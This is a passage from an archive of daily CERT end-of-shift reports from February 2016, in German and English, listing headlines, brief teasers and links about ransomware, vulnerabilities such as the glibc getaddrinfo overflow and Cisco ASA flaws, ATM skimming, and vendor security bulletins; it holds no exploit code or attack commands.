======================= = End-of-Shift report = ======================= Timeframe: Montag 15-02-2016 18:00 − Dienstag 16-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** More Multi-Architecture IoT Malware, (Mon, Feb 15th) *** --------------------------------------------- Attackers have problems too: Attacks against Internet of Things (IoT) devices are simple (as in log in...), but the attacker never knows what kind of architecture they may hit. IoT devices often go beyond the standard x86 architecture we are used to on our servers and workstations. What I typically see .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20731 *** Password cracking attacks on Bitcoin wallets net $103,000 *** --------------------------------------------- Hackers have siphoned about $103,000 out of Bitcoin accounts that were protected with an alternative security measure, according to research that tracked six years' worth of transactions. Account-holders used easy-to-remember passwords to protect their accounts instead of the long cryptographic keys normally required. --------------------------------------------- http://arstechnica.com/security/2016/02/password-cracking-attacks-on-bitcoi… *** Cisco Emergency Responder Cross-Site Scripting Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco IOS Software for Cisco Industrial Ethernet 2000 Series Switches Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Exploiting (pretty) blind SQL injections, (Mon, Feb 15th) *** --------------------------------------------- Although a lot has been written about SQL injection vulnerabilities, they can still be found relatively often. In most of the cases Ive seen in last couple of years, I had to deal with blind SQL injection vulnerabilities. Typically, .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20733 *** VoIP phones can be turned into spying or money-making tools *** --------------------------------------------- A security vulnerability present in many enterprise-grade VoIP phones can easily be exploited by hackers to spy on employees and management, says security consultant Paul Moore. In a less dangerous attack alternative, these compromised devices can also be made to covertly place calls to premium .. --------------------------------------------- https://www.helpnetsecurity.com/2016/02/16/voip-phones-can-turned-spying-mo… *** Ransomware: Neben deutschen Krankenhäusern auch US-Klinik von Virus lahmgelegt *** --------------------------------------------- Nicht nur in Deutschland kämpfen Krankenhäuser immer wieder gegen Verschlüsselungstrojaner. In Los Angeles ist eine Klinik seit mehr als einer Woche lahmgelegt. Die Programmierer fordern angeblich mehr als 3 Millionen US-Dollar Lösegeld. --------------------------------------------- http://heise.de/-3103733 *** "Fake President": E-Mail-Betrüger erleichtern Konzerne um Millionenbeträge *** --------------------------------------------- Vorstands-Accounts und machen ahnungslose Buchhalter zu ihren Komplizen --------------------------------------------- http://derstandard.at/2000031179980 *** Geldautomaten: Skimming an der Netzwerkbuchse *** --------------------------------------------- Skimming ist ein bekanntes Problem - Kriminelle verwenden nachgebaute Tastaturfelder und Magnetkartenleser, um Kundendaten an Geldautomaten zu kopieren. Jetzt warnt der Hersteller NCR vor neuen Gefahren. --------------------------------------------- http://www.golem.de/news/geldautomaten-skimming-an-der-netzwerkbuchse-1602-… *** USN-2855-2: Samba regression *** --------------------------------------------- Ubuntu Security Notice USN-2855-216th February, 2016samba regressionA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.10 Ubuntu 14.04 LTS Ubuntu 12.04 LTSSummaryUSN-2855-1 introduced a regression in .. --------------------------------------------- http://www.ubuntu.com/usn/usn-2855-2/ *** Erpressungs-Trojaner Locky schlägt offenbar koordiniert zu *** --------------------------------------------- Locky lauerte vermutlich bereits eine Weile auf den infizierten Systemen, ehe es am vergangenen Montag zeitgleich bei mehreren Opfern mit der Verschlüsselung persönlicher Dateien begonnen hat. --------------------------------------------- http://heise.de/-3104069 *** Stuxnet angeblich Teil eines größeren Angriffs auf kritische Infrastruktur des Iran *** --------------------------------------------- Dass die USA und Israel hinter Stuxnet steckten, um Irans Atomprogramm zu stören, gilt mittlerweile als gesichert. Ein neuer Dokumentarfilm behauptet nun, dass der Cyber-Wurm Teil eines viel größeren Programms war, das den ganzen Iran lahmlegen sollte. --------------------------------------------- http://heise.de/-3104957 *** TYPO3 CMS 6.2.18 and 7.6.3 released *** --------------------------------------------- Both versions are maintenance releases and contain bug and security fixes. In case the extension compatibility6 is used, please make sure to upgrade to version 7.6.2. --------------------------------------------- https://typo3.org/news/article/typo3-cms-6218-and-763-released/ *** Glibc: Sicherheitslücke gefährdet fast alle Linux-Systeme *** --------------------------------------------- Eine schwerwiegende Sicherheitslücke klafft in der Glibc-Bibliothek, die in fast allen Linux-Systemen genutzt wird: Eine DNS-Funktion erlaubt die Ausführung von bösartigem Code. Nutzer sollten schnellstmöglich Updates installieren. --------------------------------------------- http://www.golem.de/news/glibc-sicherheitsluecke-gefaehrdet-fast-alle-linux… *** CVE-2015-7547 --- glibc getaddrinfo() stack-based buffer overflow *** --------------------------------------------- The glibc project thanks the Google Security Team and Red Hat for reporting the security impact of this issue, and Robert Holiday of Ciena for reporting the related bug 18665. --------------------------------------------- https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html

1 0

Tageszusammenfassung - Montag 15-02-2016
by Daily end-of-shift report 15 Feb '16

15 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Freitag 12-02-2016 18:00 − Montag 15-02-2016 18:00 Handler: Alexander Riepl Co-Handler: n/a *** A Look Behind The Skype Malvertising Campaign *** --------------------------------------------- As reported by F-Secure, a recent malvertising campaign has been hitting several top publishers to push the Angler exploit kit and install the TeslaCrypt ransomware, according to the Finnish company. Some of these infections happened via Skype, which displays ad banners within its product. --------------------------------------------- https://blog.malwarebytes.org/malvertising-2/2016/02/a-look-behind-the-skyp… *** Fake SUPEE-5344 Patch Steals Payment Details *** --------------------------------------------- In case you don't know, SUPEE-5344 is an official security patch to the infamous Magento shoplift bug. That bug allows bad actors to obtain admin access to vulnerable Magento sites. While the patch was released February 2015 many sites unfortunately did .. --------------------------------------------- https://blog.sucuri.net/2016/02/fake-supee-5344-patch-steals-payment-detail… *** VMware VMSA-2015-0007.3 has been Re-released, (Sat, Feb 13th) *** --------------------------------------------- VMware has re-issue VMSA-2015-0007.3 today after they found an earlier fix for CVE-2016-2342 was incomplete. Affected ESXi versions are: 5.0, 5.1 and 5.5. Advisory can be .. --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20727 *** Critical Fixes Issued for Windows, Java, Flash *** --------------------------------------------- Microsoft Windows users and those with Adobe Flash Player or Java installed, its time to update again! Microsoft released 13 updates to address some three dozen unique security vulnerabilities. Adobe issued security updates for its Flash Player software that plugs at least 22 security holes in the widely-used browser plugin. Meanwhile, Oracle issued an unscheduled security fix for Java, its second security update for Java in as many weeks. --------------------------------------------- http://krebsonsecurity.com/2016/02/criticial-fixes-issued-for-windows-java-… *** Verschlüsselungs-Trojaner: mp3-Variante von TeslaCrypt *** --------------------------------------------- Leser gaben der Redaktion Hinweise auf verschlüsselte Dateien mit der Endung .mp3. Die scheint eine neue Variante des Verschlüsselungs-Trojaners TeslaCrypt zu erzeugen. --------------------------------------------- http://heise.de/-3101992 *** DSA-3477 iceweasel - security update *** --------------------------------------------- Holger Fuhrmannek discovered that missing input sanitising in theGraphite font rendering engine could result in the execution of arbitrarycode. --------------------------------------------- https://www.debian.org/security/2016/dsa-3477 *** Nigerianischer Astronaut im All verloren: Spam begeistert Netz *** --------------------------------------------- Nutzer können angeblich ein Investment von drei Millionen Dollar verdoppeln --------------------------------------------- http://derstandard.at/2000031110981 *** IT-Sicherheit: Immer mehr komplexe Angriffe auf Firmen *** --------------------------------------------- Neuer Cybersicherheits-Bericht zeigt erhöhte Gefahrenlage im Internet --------------------------------------------- http://derstandard.at/2000031119634 *** Mazar Bot Actively Targeting Android Devices *** --------------------------------------------- Researchers at Heimdal Security report public attacks against Android devices using the Mazar bot, which was advertised months ago in a Russian cybercrime forum. --------------------------------------------- http://threatpost.com/mazar-bot-actively-targeting-android-devices/116240/ *** Update auf Version 1.17: Veracrypt soll jetzt doppelt so schnell sein *** --------------------------------------------- Veracrypt ist einer der beliebtesten Nachfolger des eingestellten Truecrypt - ein Update bringt jetzt neue Funktionen. Ausserdem soll das Laden von Containern deutlich schneller vonstattengehen - bislang einer der grössten Kritikpunkte .. --------------------------------------------- http://www.golem.de/news/update-auf-version-1-17-veracrypt-soll-jetzt-doppe… *** Virus legte Krankenhaus in Deutschland lahm *** --------------------------------------------- "Befunde mussten persönlich, per Telefon oder Fax übermittelt werden" --------------------------------------------- http://derstandard.at/2000031136914 *** [R1] Nessus < 6.5.5 Multiple Vulnerabilities *** --------------------------------------------- http://www.tenable.com/security/tns-2016-02 *** Reflecting on Recent iOS and Android Security Updates *** --------------------------------------------- The last thirty days proven to be yet another exciting time for the mobile security ecosystem. Apple and Google released updates for their respective mobile operating systems that fix several critical issues - including some in the kernel that may be exploited remotely. --------------------------------------------- https://blog.zimperium.com/reflecting-on-recent-ios-and-android-security-up…

1 0

Tageszusammenfassung - Freitag 12-02-2016
by Daily end-of-shift report 12 Feb '16

12 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 11-02-2016 18:00 − Freitag 12-02-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** SC Congress: "flakey kettles and dolls that swear at you" *** --------------------------------------------- Ken Munro, managing director of Pen Test Partners, showed the SC Congress just how easy it is to crack a whole range of IoT nonsense --------------------------------------------- http://www.scmagazine.com/sc-congress-flakey-kettles-and-dolls-that-swear-a… *** Determining Physical Location on the Internet *** --------------------------------------------- Interesting research: "CPV: Delay-based Location Verification for the Internet": Abstract: The number of location-aware services over the Internet continues growing. Some of these require the clients geographic location for security-sensitive applications. Examples include location-aware authentication, location-aware access policies, fraud prevention, complying with media licensing, and regulating online gambling/voting. An adversary can evade existing geolocation techniques, e.g.,... --------------------------------------------- https://www.schneier.com/blog/archives/2016/02/determining_phy.html *** New Trojan threatens users' bank accounts *** --------------------------------------------- February 12, 2016 Banking Trojans are considered to be one of the most dangerous threats. Not only they have a complex architecture but they are also capable to perform a wide variety of functions. Yet, some attackers do not disdain to contrive rather primitive malicious programs such as, for example, Trojan.Proxy2.102, which was examined by Doctor Web specialists. Trojan.Proxy2.102 steals money from victims' bank accounts using the following method. Once launched, it installs a root... --------------------------------------------- http://news.drweb.com/show/?i=9840&lng=en&c=9 *** Vermehrte Scans und Workarounds zu Ciscos ASA-Lücke *** --------------------------------------------- Die Angreifer sammeln offenbar bereits aktiv Informationen zu möglicherweise verwundbaren Systemen, während die Verteidiger noch mit den Tücken des Updates kämpfen. --------------------------------------------- http://heise.de/-3100443 *** Download.com and Others Bundle Superfish-Style HTTPS Breaking Adware *** --------------------------------------------- It's a scary time to be a Windows user. Lenovo was bundling HTTPS-hijacking Superfish adware, Comodo ships with an even worse security hole called PrivDog, and dozens of other apps like LavaSoft are doing the same. It's really bad, but if you want your encrypted web sessions to be hijacked just head to CNET Downloads or any freeware site, because they are all bundling HTTPS-breaking adware now. --------------------------------------------- http://www.howtogeek.com/210265/download.com-and-others-bundle-superfish-st… *** How to Avoid Potentially Unwanted Programs *** --------------------------------------------- We've come up with a PUPs cheat sheet that businesses can use to train IT staff and users. A little PUPs awareness, if you will. Read on to learn more about how you get PUPs, Categories: Online SecurityTags: avoidpotentially unwanted programsPUP(Read more...) --------------------------------------------- https://blog.malwarebytes.org/online-security/2016/02/how-to-avoid-potentia… *** How to use the traffic light protocol - TLP *** --------------------------------------------- The TLP or Traffic Light Protocol is a set of designations designed to help sharing of sensitive information. It has been widely adopted in the CSIRT and security community. The originator of the information labels the information with one of four colours. These colours indicate what further dissemination, if any, can be undertaken by the recipient. Note that the colours only mark the level of dissemination, not the sensitivity level (although they often align). --------------------------------------------- https://www.vanimpe.eu/2015/08/21/use-traffic-light-protocol-tlp/ *** D-Link DSL-2750B Remote Command Execution *** --------------------------------------------- Topic: D-Link DSL-2750B Remote Command Execution Risk: High Text:After some playing around Ive noticed something interesting during login phase: by sending wrong credentials, user is redirec... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016020128 *** Sophos UTM 9 Cross Site Scripting *** --------------------------------------------- Topic: Sophos UTM 9 Cross Site Scripting Risk: Low Text: -- Vendor: -- Sophos (https://www.sophos.com) -- Affected Products/Versions: -- Produc... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016020117 *** ASUS Router Administrative Interface Exposure *** --------------------------------------------- Topic: ASUS Router Administrative Interface Exposure Risk: Low Text:Asus wireless routers running ASUSWRT firmware (in other words, anything with an RT- in the model name) have a design flaw in w... --------------------------------------------- https://cxsecurity.com/issue/WLB-2016020116 *** ZCM 11.3.x - Fix for CVE-2015-5970 ZCM ZENworks ChangePassword XPath Injection Information Disclosure Vulnerability - See TID 7017240 *** --------------------------------------------- Abstract: Vulnerability overview: CVE-2015-5970 An XPath injection exists in the ChangePassword RPC method implementation. By combining this with an entity reference to a file on the appliance, an attacker can exfiltrate arbitrary text files from the vulnerable device.This issue has been found and reported by cpnrodzc7 working with HPs Zero Day Initiative (ZDI-CAN-3136). Patch overview: This patch contains the necessary files and installation information to correct the below issue on ZCM 11.3.x --------------------------------------------- https://download.novell.com/Download?buildid=vt0EO0DgaX8~ *** ZCM 11.4.x - Fix for CVE-2015-5970 ZCM ZENworks ChangePassword XPath Injection Information Disclosure Vulnerability - See TID 7017240 *** --------------------------------------------- Abstract: Vulnerability overview: CVE-2015-5970 An XPath injection exists in the ChangePassword RPC method implementation. By combining this with an entity reference to a file on the appliance, an attacker can exfiltrate arbitrary text files from the vulnerable device.This issue has been found and reported by cpnrodzc7 working with HPs Zero Day Initiative (ZDI-CAN-3136). Patch overview: This patch contains the necessary files and installation information to correct the below issue on ZCM 11.4.x --------------------------------------------- https://download.novell.com/Download?buildid=SOM6P0NdZ5U~ *** PostgreSQL Bugs Let Remote Users Deny Service and Let Remote Authenticated Users Gain Elevated Privileges *** --------------------------------------------- http://www.securitytracker.com/id/1035005 *** DFN-CERT-2016-0260: Mozilla Firefox, Firefox ESR: Zwei Schwachstellen ermöglichen u.a. das Umgehen von Sicherheitsvorkehrungen *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0260/ *** DFN-CERT-2016-0263: Cacti: Mehrere Schwachstellen ermöglichen u.a. das Ausführen beliebigen Programmcodes *** --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0263/

1 0

Tageszusammenfassung - Donnerstag 11-02-2016
by Daily end-of-shift report 11 Feb '16

11 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 10-02-2016 18:00 − Donnerstag 11-02-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Critical bug found in Cisco ASA products, attackers are scanning for affected devices *** --------------------------------------------- Several Cisco Adaptive Security Appliance (ASA) products - appliances, firewalls, switches, routers, and security modules - have been found sporting a flaw that can ultimately lead to remote code exec... --------------------------------------------- http://www.net-security.org/secworld.php?id=19427 *** Some notes on VirusTotal. *** --------------------------------------------- Many of you are probably familiar with VirusTotal, a service that allows you to scan a file or URL using multiple antivirus and URL scanners. VirusTotal results are often used in write-ups about...read moreThe post Some notes on VirusTotal. appeared first on Webroot Threat Blog. --------------------------------------------- http://www.webroot.com/blog/2016/02/09/some-notes-on-virustotal/ *** Seo-moz.com SEO Spam Campaign *** --------------------------------------------- Here at Sucuri we handle countless cases of SEO spam. This malware involves a website being compromised in order to spread (mostly pharmaceutical) advertisements by linking visitors to unwanted websites and stuffing spam keywords into the site. These links and keywords help the spam websites to rank higher in search engines like Google, sending evenRead More The post Seo-moz.com SEO Spam Campaign appeared first on Sucuri Blog. --------------------------------------------- https://blog.sucuri.net/2016/02/seo-moz-com-seo-spam-campaign.html *** Malvertising Via Skype Delivers Angler *** --------------------------------------------- A recent malvertising campaign shows that platforms that display ads, even when they are not necessarily the browser, are not immune to the attack. An example of a popular non-browser application that shows ads is Skype. These images would be familiar to avid Skype users. This did not really bother us much until last night, when we... --------------------------------------------- https://labsblog.f-secure.com/2016/02/10/malvertising-via-skype-delivers-an… *** Tomcat IR with XOR.DDoS, (Thu, Feb 11th) *** --------------------------------------------- Apache Tomcat is a java based web service that is used for different applications. While you may have it running in your environment, you may not be familiar with its workings to provide adequate incident response "> "> ">0 S root 31847 1 0 80 0 - 1124641 futex_ 2015 ? 02:36:33 /usr/bin/java -classpath /usr/share/apache-tomcat-7.0.65/bin/bootstrap.jar ">Here you can see that it is running from /usr/share/apache-tomcat-7.0.65. ">The Tomcat configurations --------------------------------------------- https://isc.sans.edu/diary.html?storyid=20721&rss *** Building automation systems are so bad IBM hacked one for free *** --------------------------------------------- Remote sites owned as router, controller and server all fall to pen-test team An IBM-led penetration testing team has thoroughly owned an enterprise building management network in a free assessment designed to publicise the horrid state of embedded device security. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/02/11/building_au… *** How Malware Detects Virtualized Environment, and its Countermeasures - An Overview *** --------------------------------------------- Virtual Machines are usually considered a good way to analyze malware as they can provide an isolated environment for the malware to trigger but their actions can be controlled and intercepted. However, modern age malware detects their environment in which they are running, and if they detect they are running in VM, they sustain their... --------------------------------------------- http://resources.infosecinstitute.com/how-malware-detects-virtualized-envir… *** DFN-CERT-2016-0252: Cisco Adaptive Security Appliance Software: Eine Schwachstelle ermöglicht die Übernahme der Systemkontrolle *** --------------------------------------------- Eine Schwachstelle in der Cisco Adaptive Security Appliances Software ermöglicht einem entfernten, nicht authentifizierten Angreifer beliebigen Programmcode auszuführen und so die Kontrolle über ein betroffenes System zu übernehmen, auch ist die Durchführung eines Denial-of-Service-Angriffs möglich. --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0252/ *** ZDI-16-163: Dell SonicWALL GMS Virtual Appliance Deserialization of Untrusted Data Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell SonicWALL GMS Virtual Appliance. Authentication is not required to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-163/ *** ZDI-16-164: Dell SonicWALL GMS Virtual Appliance Multiple Remote Code Execution Vulnerabilities *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell SonicWALL GMS Virtual Appliance. Authentication is required to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-16-164/ *** Cisco Spark Representational State Transfer Interface Information Disclosure Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Spark Representational State Transfer Interface Unauthorized Access Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Spark Representational State Transfer Interface Denial of Service Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco Advanced Malware Protection and Email Security Appliance Proxy Engine Security Bypass Vulnerability *** --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Citrix NetScaler Application Delivery Controller and NetScaler Gateway Multiple Security Updates *** --------------------------------------------- A number of vulnerabilities have been identified in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway that could allow a malicious, unprivileged user to perform privileged operations or execute commands. --------------------------------------------- https://support.citrix.com/article/CTX206001 *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Vulnerability in libssh2 affects PowerKVM (CVE-2015-1782) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023318 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in curl affect PowerKVM *** http://www.ibm.com/support/docview.wss?uid=isg3T1023307 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in IBM Java Runtime affects Tivoli Storage Manager Operations Center and Tivoli Storage Manager Client Management Service (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976362 --------------------------------------------- *** IBM Security Bulletin:Security Bulletin: Vulnerability in IBM Java Runtime affect AppScan Source (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976569 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in cpio affects PowerKVM (CVE-2014-9112) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023298 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in Linux Kernel affects PowerKVM (CVE-2016-0728) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023279 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in OpenSSL affects IBM Netezza Platform Software clients (CVE-2015-3194) *** http://www.ibm.com/support/docview.wss?uid=swg21976419 --------------------------------------------- *** IBM Security Bulletin: IBM Sterling Order Management is affected by Apache Commons Collections security vulnerabilities (CVE-2015-7450) *** http://www.ibm.com/support/docview.wss?uid=swg21975793 --------------------------------------------- *** IBM Security Bulletin: Cross-site scripting vulnerability in Liberty for Java for IBM Bluemix (CVE-2015-7417) *** http://www.ibm.com/support/docview.wss?uid=swg21976218 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM JAVA Runtime affect AppScan Source (CVE-2015-4872) *** http://www.ibm.com/support/docview.wss?uid=swg21976159 ---------------------------------------------

1 0

Tageszusammenfassung - Mittwoch 10-02-2016
by Daily end-of-shift report 10 Feb '16

10 Feb '16

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 09-02-2016 18:00 − Mittwoch 10-02-2016 18:00 Handler: Stephan Richter Co-Handler: n/a *** Fast Flux Bot Nets and Fluxer - Part 1 *** --------------------------------------------- This time well start a two-parter on fast flux bot nets including the concept of domain generation algorithms. --------------------------------------------- http://www.scmagazine.com/fast-flux-bot-nets-and-fluxer--part-1/article/473… *** DMA Locker Strikes Back *** --------------------------------------------- A few days ago we published a post about a new ransomware - DMA Locker (read more here). At that time, it was using a pretty simple way of storing keys. Having the original sample was enough to recover files. Unfortunately, the latest version (discovered February 8th) comes with several improvements and RSA key. Let's... --------------------------------------------- https://blog.malwarebytes.org/news/2016/02/dma-locker-strikes-back/ *** Linode SSH key blunder left virtual servers open to man-in-the-middle fiddles for months *** --------------------------------------------- Regen your keys ASAP Web hosting biz Linode broke the security in its customers virtual machines, allowing attackers to eavesdrop on SSH connections and hijack them. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2016/02/09/linode_ssh_… *** Skimmers Hijack ATM Network Cables *** --------------------------------------------- If you have ever walked up to an ATM to withdraw cash only to decide against it after noticing a telephone or ethernet cord snaking from behind the machine to a jack in the wall, your paranoia may not have been misplaced: ATM maker NCR is warning about skimming attacks that involve keypad overlays, hidden cameras and skimming devices plugged into the ATM network cables to intercept customer card data. --------------------------------------------- http://krebsonsecurity.com/2016/02/skimmers-hijack-atm-network-cables/ *** Patchday: Microsoft stopft 6 kritische Lücken, lässt alte Internet-Explorer-Versionen im Regen stehen *** --------------------------------------------- Es ist wieder einmal Zeit zum Updaten für Microsoft-Anwender. Wer noch ältere Versionen des Internet Explorer im Einsatz hat, muss jetzt schleunigst handeln. --------------------------------------------- http://heise.de/-3098499 *** The history of Cryptowall: a large scale cryptographic ransomware threat *** --------------------------------------------- This tracker focusses on tracking the development changes in the CryptoWall ransomware, it does not attempt to track every single CryptoWall sample that exists. It simply exists to track the family in a more higher level fashion, a few samples will be listed next to specific versions just for reference rather than bulk collection. The timeline below shows the development track of CryptoWall when new versions were first seen. Below the timeline you will find an overview. --------------------------------------------- https://www.cryptowalltracker.org/ *** Sparkle-Installer: Gatekeeper-Sicherung für Macs lässt sich umgehen *** --------------------------------------------- Viele App-Entwickler für Mac nutzen das Sparkle-Framwork für praktische Auto-Updates - und machen damit zahlreiche Mac-Programme angreifbar. Betroffen sind nicht nur VLC und uTorrent. --------------------------------------------- http://www.golem.de/news/man-in-the-middle-angriff-sparkle-installer-macht-… *** Cracking Damn Insecure and Vulnerable App (DIVA) - part 5: *** --------------------------------------------- In the first four articles, we have discussed solutions for the first eleven challenges in DIVA. In this last article of this series, we will discuss the remaining two challenges that are related to native code. In case if you missed the previous articles in this series, here are the links. http://resources.infosecinstitute.com/cracking-damn-insecure-and-vulnerable… http://resources.infosecinstitute.com/cracking-damn-insecure-and-vulnerable… --------------------------------------------- http://resources.infosecinstitute.com/cracking-damn-insecure-and-vulnerable… *** Hijacking forgotten & misconfigured subdomains *** --------------------------------------------- Its been a while since my last blog post, so I decided to release a new tool. I think that we need more articles about "DNS hacking", I hope that you will learn something new here. --------------------------------------------- http://www.xexexe.cz/2016/02/hijacking-forgotten-misconfigured.html *** Network forensic analysis tool NetworkMiner 2.0 released *** --------------------------------------------- NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. ... --------------------------------------------- http://www.net-security.org/secworld.php?id=19421 *** MSRT February 2016 *** --------------------------------------------- The February release of the Microsoft Malicious Software Removal Tool (MSRT) includes updated detections for the following malware families: Bladabindi Gamarue Sality Kelihos Diplugem The updates include detections for the latest variants from these malware families. There were no new malware families added to the MSRT this month. The MSRT works in tandem with real-time... --------------------------------------------- https://blogs.technet.microsoft.com/mmpc/2016/02/09/msrt-february-2016/ *** MS16-FEB - Microsoft Security Bulletin Summary for February 2016 - Version: 1.0 *** --------------------------------------------- https://technet.microsoft.com/en-us/library/security/MS16-FEB *** Deception: Shine Bright Like a Diamond *** --------------------------------------------- ***German Summary: Projektpläne, Designs, Kundendaten: Die Kronjuwelen eines jeden Unternehmens gehören vor Cyberkriminellen unter allen Umständen versteckt - oder? Werfen Sie den Ködern aus, denn jetzt täuschen die Guten! Deception ("Täuschung") lautet der neue Cyber-Security-Ansatz, der nach Schätzungen des renommierten Marktforschungsunternehmens Gartner bereits 2018 in rund 10 % aller Unternehmen zum Einsatz kommen wird. Virtuelle Fallen... --------------------------------------------- http://blog.sec-consult.com/2016/02/deception-shine-bright-like-diamond.html *** Tollgrade SmartGrid Sensor Management System Software Vulnerabilities *** --------------------------------------------- This advisory contains mitigation details for vulnerabilities in Tollgrade Communications, Inc.'s SmartGrid LightHouse Sensor Management System (SMS) Software EMS. --------------------------------------------- https://ics-cert.us-cert.gov/advisories/ICSA-16-040-01 *** Bugtraq: Safebreach adsivory: Node.js HTTP Response Splitting (CVE-2016-2216) *** --------------------------------------------- http://www.securityfocus.com/archive/1/537490 *** Bugtraq: ESA-2016-010 EMC Documentum xCP Security Update for Multiple Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/archive/1/537489 *** Bugtraq: dotDefender Firewall CSRF *** --------------------------------------------- http://www.securityfocus.com/archive/1/537491 *** [2016-02-10] Yeager CMS multiple vulnerabilities *** --------------------------------------------- Yeager CMS suffers from multiple critical security issues including multiple SQL injections, arbitrary file upload, server-side request forgery and non-permanent cross-site scripting vulnerabilities. Unauthenticated attackers are able to compromise Yeager CMS in both application and database levels. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2016… *** DFN-CERT-2016-0237: Horde Application Framework: Zwei Schwachstellen ermöglichen einen Cross-Site-Scripting-Angriff *** --------------------------------------------- 09.02.2016 --------------------------------------------- https://portal.cert.dfn.de/adv/DFN-CERT-2016-0237/ *** Cisco Security Advisories *** --------------------------------------------- *** Cisco ASA Software IKEv1 and IKEv2 Buffer Overflow Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Prime Collaboration Provisioning Local Privilege Escalation Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Application Policy Infrastructure Controller Enterprise Module Web Framework Cross-Site Scripting Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Video Communications Server Information Disclosure Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Unified Products Information Disclosure Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** Cisco Unified Communications Manager Information Disclosure Vulnerability *** http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… --------------------------------------------- *** IBM Security Bulletins *** --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities in IBM SDK Java Technology Edition affect Liberty for Java for IBM Bluemix January 2016 CPU (CVE-2016-0475, CVE-2016-0466, CVE-2015-7575, CVE-2016-0448) *** http://www.ibm.com/support/docview.wss?uid=swg21976217 --------------------------------------------- *** IBM Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Security SiteProtector System (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21976042 --------------------------------------------- *** IBM Security Bulletin: Vulnerabilities in OpenSSH affect IBM Flex System Manager (FSM) (CVE-2016-0777, CVE-2016-0778) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023319 --------------------------------------------- *** IBM Security Bulletin: IBM Pure Power Integrated Manager (PPIM) is affected by vulnerabilities in ntp (CVE-2014-9750, CVE-2014-9751) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023291 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects IBM Pure Power Integrated Manager (PPIM) (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=isg3T1023292 --------------------------------------------- *** IBM Security Bulletin: Vulnerability in MD5 Signature and Hash Algorithm affects Watson Explorer (CVE-2015-7575) *** http://www.ibm.com/support/docview.wss?uid=swg21974808 --------------------------------------------- *** IBM Security Bulletin: IBM Netezza SQL Extensions is vulnerable to an OpenSource PCRE Vulnerability (CVE-2015-8380, CVE-2015-8382, CVE-2015-8391) *** http://www.ibm.com/support/docview.wss?uid=swg21976124 --------------------------------------------- *** IBM Security Bulletin: Multiple vulnerabilities identified in IBM Java SDK affect WebSphere Service Registry and Repository Studio (CVE-2015-4872, CVE-2015-4911, CVE-2015-4893, CVE-2015-4803) *** http://www.ibm.com/support/docview.wss?uid=swg21971058 --------------------------------------------- *** IBM Security Bulletin: A libxml vulnerability affects IBM Security Access Manager for Mobile 